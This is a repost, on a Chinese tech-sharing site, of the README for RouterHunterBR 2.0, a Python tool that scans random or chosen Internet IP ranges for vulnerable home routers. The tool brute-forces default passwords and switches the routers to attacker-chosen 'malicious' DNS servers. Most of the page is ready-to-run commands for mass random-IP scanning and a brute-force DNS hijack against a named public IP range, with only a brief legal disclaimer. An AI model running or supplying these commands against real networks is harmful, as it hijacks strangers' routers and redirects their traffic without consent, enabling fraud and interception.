| 注册
请输入搜索内容

热门搜索

Java Linux MySQL PHP JavaScript Hibernate jQuery Nginx
jopen
8年前发布

Routerhunter-2.0 - 测试在连接到互联网的设备和路由器的漏洞

Scanner Routerhunter 2.0

Tool used to find vulnerable routers and devices on the Internet and perform tests

              _           _           _                    ___ ___ _ _| |_ ___ ___| |_ _ _ ___| |_ ___ ___    |  _| . | | |  _| -_|  _|   | | |   |  _| -_|  _|   |_| |___|___|_| |___|_| |_|_|___|_|_|_| |___|_|                         BR - v2.0     Tool used to find vulnerable routers and devices on the Internet and perform tests.    [ Coded by Jhonathan Davi a.k.a jh00nbr - jhoonbr at protonmail.ch ]  [ fb.com/JhonVipNet - 推ter.com/jh00nbr - github.com/jh00nbr/ - blog.inurl.com.br - www.油Tube.com/c/Mrsinisterboy ]      [!] legal disclaimer: Usage of RouterHunterBR for attacking targets without prior mutual   consent is illegal. It is the end user's responsibility to obey all applicable local, state and   federal laws.Developers assume no liability and are not responsible for any misuse or damage caused  by this program.  

https://jh00nsec.wordpress.com/2016/01/22/routerhunterbr-2-0-testing-vulnerabilities-in-devices-and-routers-connected-to-the-internet-dnschanger/

Description


The RouterhunterBR is an automated security tool that finds vulnerabilities and performs tests on routers and vulnerable devices on the Internet. The RouterhunterBR was designed to run over the Internet looking for defined ips tracks or random in order to automatically exploit the vulnerability DNSChanger on home routers.

The script explores four vulnerabilities in routers

Requirements

import sys, os, argparse, itertools, requests, random, time, threading, base64, socket  from datetime import datetime

Usage

  -range 192.168.1.0-255, --range 192.168.1.0-255  Set range of IP    -bruteforce, --bruteforce                        Performs brute force with users and passwords standards, and soon    after defines the malicious DNS.    -startip 192.168.*.*, --startip 192.168.*.*      Start - IP range customized with wildcard / 201.*.*.*    -endip 192.168.*.*, --endip 192.168.*.*          End - IP range customized with wildcard / 201.*.*.*    -dns1 8.8.8.8, --dns1 8.8.8.8                    Define malicious dns1    -dns2 8.8.4.4, --dns2 8.8.4.4                    Define malicious dns2    --threads 10                                     Set threads numbers    -rip, --randomip                                 Randomizing ips routers    -lmtip 10, --limitip 10                          Define limite random ip

Commands

Random ips  python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --randomip --limitip 10 --threads 10                        python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 -rip -lmtip 10 --threads 10
Scanner in range ip:  python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --range 192.168.25.0-255 --threads 10
IP range customized with wildcard / Ex: --startip 201.*.*.* -  --endip 201.*.*.*  python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --startip 192.168.*.* --endip 192.168.*.* --threads 10
Brute force with users and passwords on routers that requires authentication, forcing alteration of dns - DSLink 260E.  python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.4 --range 177.106.19.65-70 --bruteforce --threads 10

Screenshots

rip range brute

项目地址: https://github.com/jh00nbr/Routerhunter-2.0

 本文由用户 jopen 自行上传分享,仅供网友学习交流。所有权归原作者,若您的权利被侵害,请联系管理员。
 转载本站原创文章,请注明出处,并保留原始链接、图片水印。
 本站是一个以用户分享为主的开源技术平台,欢迎各类分享!
 本文地址:https://www.open-open.com/lib/view/open1454734347073.html
网络技术